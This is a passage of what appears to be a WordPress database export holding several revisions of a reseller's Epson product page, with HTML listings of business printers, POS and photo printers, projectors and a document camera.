src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>		\n			<h3>POS PRINTER</h3>		\n		<p>Epson TM-H6000IVÂ </p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><p>Epson TM-T88V-iÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul><p>Epson TM-T70IIÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>		\n			<h3>PHOTO PRINTER</h3>		\n		<p>Epson L1800 A3 Photo Ink Tank Printer</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul><p>Epson L850 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><p>Â </p><p>Epson L805 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p>Epson EB-2055<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><p>Epson EB-2142WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul><p>Epson EB-L500WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p>Epson LightScene EV-105</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><h3>ULTRA PORTABLE</h3><p>Epson EB-1785WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>		\n			<h3>INTERACTIVE</h3>		\n		<p>Epson EB-536WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><p>Epson 595Wi/585Wi/575WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p>Epson EB-L1405UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul><p>Epson EB-G7400UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul><p>Epson EB-Z10000UÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul><h3>DOCUMENT CAMERAS</h3><p>Document Camera ELPDC21Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>To discover more, please click the button below or contact us to discuss your needs.</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-24 12:59:59','2018-12-24 04:59:59','',1486,'https://bintara.com.my/blog/2018/12/24/1486-revision-v1/',0,'revision','',0),(2754,1,'2018-12-24 14:17:58','2018-12-24 06:17:58','[vfb id=10]','Get Quotation (Epson)','','inherit','closed','closed','','2753-revision-v1','','','2018-12-24 14:17:58','2018-12-24 06:17:58','',2753,'https://bintara.com.my/blog/2018/12/24/2753-revision-v1/',0,'revision','',0),(2756,1,'2018-12-24 14:25:55','2018-12-24 06:25:55','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h3>Printers for Work</h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h3>BUSINESS INKJET PRINTER</h3>		\n		<p>Epson WorkForce Enterprise WF-C17590Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul><p>[maxbutton id=\"12\" ]</p><p>Epson WorkForce Pro WF-C5290Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><p>[maxbutton id=\"12\" ]</p><p>Epson WorkForce WF-100Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul><p>[maxbutton id=\"12\" ]</p><p>Epson WorkForce WF-7711Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INK TANK SYSTEM</h3>		\n		<p>Epson EcoTank L3150Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul>[maxbutton id=\"12\" ]<p>Epson L120 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p>Epson M1100 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>LASER PRINTER</h3>		\n		<p>Epson AcuLaser C9300NÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â Epson WorkForce AL-M320DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p>Epson WorkForce AL-M8100DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p>Epson TM-H6000IVÂ </p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p>Epson TM-T88V-iÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p>Epson TM-T70IIÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p>Epson L1800 A3 Photo Ink Tank Printer</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p>Epson L850 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p>Epson L805 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p>Epson EB-2055<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p>Epson EB-2142WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p>Epson EB-L500WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p>Epson LightScene EV-105</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p>Epson EB-1785WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p>Epson EB-536WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p>Epson 595Wi/585Wi/575WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p>Epson EB-L1405UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p>Epson EB-G7400UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p>Epson EB-Z10000UÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p>Document Camera ELPDC21Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-24 14:25:55','2018-12-24 06:25:55','',1486,'https://bintara.com.my/blog/2018/12/24/1486-revision-v1/',0,'revision','',0),(2758,1,'2018-12-24 14:31:02','2018-12-24 06:31:02','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and 